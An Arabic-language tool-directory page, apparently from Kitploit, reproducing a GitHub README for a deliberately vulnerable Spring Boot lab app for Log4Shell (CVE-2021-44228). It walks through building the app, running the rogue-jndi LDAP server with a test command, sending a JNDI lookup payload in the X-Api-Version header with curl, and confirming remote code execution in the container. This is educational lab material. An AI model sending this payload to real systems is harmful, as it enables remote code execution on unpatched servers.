Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228-poc — تطبيق نموذجي لـ log4shell (CVE-2021-44228) | Kitploit
أدوات/GitHubGitHub/kadantte/cve-2021-44228-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubkadantte/cve-2021-44228-poc

CVE-2021-44228-poc

تطبيق نموذجي لـ log4shell (CVE-2021-44228)

عرض المستودع
43منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تطبيق نموذجي ضعيف Log4Shell (CVE-2021-44228)

هذا تطبيق ضعيف شبه منسوخ/مشابه للتطبيق الموجود في https://github.com/christophetd/log4shell-vulnerable-app

الاختلافات الرئيسية هي استخدام Maven بدلاً من Gradle، واستخدام rogue-jndi.

يحتوي هذا المستودع على تطبيق ويب Maven Spring Boot ضعيف أمام CVE-2021-44228، والذي يُلقّب بـ Log4Shell.

يستخدم Log4j 2.6.1 وإصدار JDK 1.8.0_181.

تشغيل تطبيق springboot

قم ببناء وتشغيل تطبيق docker springboot:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 vulnerable-app

الاستغلال

  1. git clone https://github.com/veracode-research/rogue-jndi
  2. cd rogue-jndi
  3. mvn package
  4. java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test_if_rce" --hostname "192.168.1.x"

افتح طرفية ثانية

  1. curl localhost:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.1.x:1389/o=reference}'

حيث أن 192.168.1.x في كلتا الحالتين هو عنوان IP الخاص بك

ملاحظة: لا تستخدم localhost، استخدم عنوان IP الخاص بك الفعلي.

الآن تحقق مما إذا كان RCE ناجحًا:

root@kitploit:~
$ docker ps                                 
CONTAINER ID   IMAGE            COMMAND                  CREATED         STATUS         PORTS                                       NAMES
04536dbd1dff   vulnerable-app   "java -jar demo-0.0.…"   2 minutes ago   Up 2 minutes   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   gallant_easley
root@kitploit:~
$ docker container exec -it 04536dbd1dff ash
/opt/app # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4585569232401237075
test_if_rce                              tomcat.8080.1707298461175346507

كما ترى، فإن الملف test_if_rce موجود. وهذا يعني أن RCE نجح.

ملاحظة

تم استخدام الكود والأفكار من المستودعات التالية:

  • https://github.com/rayhan0x01/log4shell-vulnerable-app/tree/mod

  • https://www.lunasec.io/docs/blog/log4j-zero-day/

  • https://github.com/christophetd/log4shell-vulnerable-app

تنزيل الأداة